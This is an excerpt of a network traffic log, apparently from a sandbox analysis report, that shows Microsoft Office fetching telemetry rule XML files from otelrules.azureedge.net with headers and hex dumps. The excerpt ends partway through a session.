                                                                                                                                      2024-11-29 22:11:46 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      124192.168.2.44987713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:47 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:47 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1364
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                      x-ms-request-id: 2ff5ce10-101e-0017-5791-3f47c7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221147Z-174f7845968psccphC1EWRuz9s00000010w00000000026p4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:47 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      125192.168.2.44987813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:47 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:47 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                      x-ms-request-id: f1763db6-d01e-007a-27fe-41f38c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221147Z-174f7845968xlwnmhC1EWR0sv8000000108g00000000mhay
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:48 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      126192.168.2.44987913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:48 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:48 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1360
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                      x-ms-request-id: b189b901-c01e-0079-3391-3fe51a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221148Z-174f7845968glpgnhC1EWR7uec00000010m000000000n9gh
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:48 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      127192.168.2.44988013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:48 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:48 UTC515INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:48 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                      x-ms-request-id: 0b728e74-b01e-001e-55a2-420214000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221148Z-174f78459684db9fhC1EWRc7g400000000dg000000002x8w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      128192.168.2.44988113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:49 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:49 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                      x-ms-request-id: f4671ffc-301e-0000-793a-40eecc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221149Z-174f7845968qj8jrhC1EWRh41s00000010gg000000006eav
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:49 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      129192.168.2.44988213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:49 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:49 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                      x-ms-request-id: 3a99e642-c01e-0049-2bdd-41ac27000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221149Z-174f7845968n2hr8hC1EWR9cag000000107g000000004quc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:50 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      130192.168.2.44988413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:50 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:50 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1427
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                      x-ms-request-id: 417f12c6-b01e-003e-571e-428e41000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221150Z-174f78459685m244hC1EWRgp2c00000010b000000000dm38
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:50 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      131192.168.2.44988513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:51 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:51 UTC515INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:51 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1390
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                      x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221151Z-174f7845968n2hr8hC1EWR9cag000000102000000000payd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:51 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      132192.168.2.44988613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:51 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:51 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1401
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                      x-ms-request-id: 2150929f-401e-0064-4382-3f54af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221151Z-174f7845968zgtf6hC1EWRqd8s0000000thg0000000051hn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:52 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      133192.168.2.44988713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:51 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:52 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1364
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                      x-ms-request-id: 902f1521-d01e-00a1-2fef-4135b1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221152Z-174f7845968j6t2phC1EWRcfe800000010r00000000082dn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
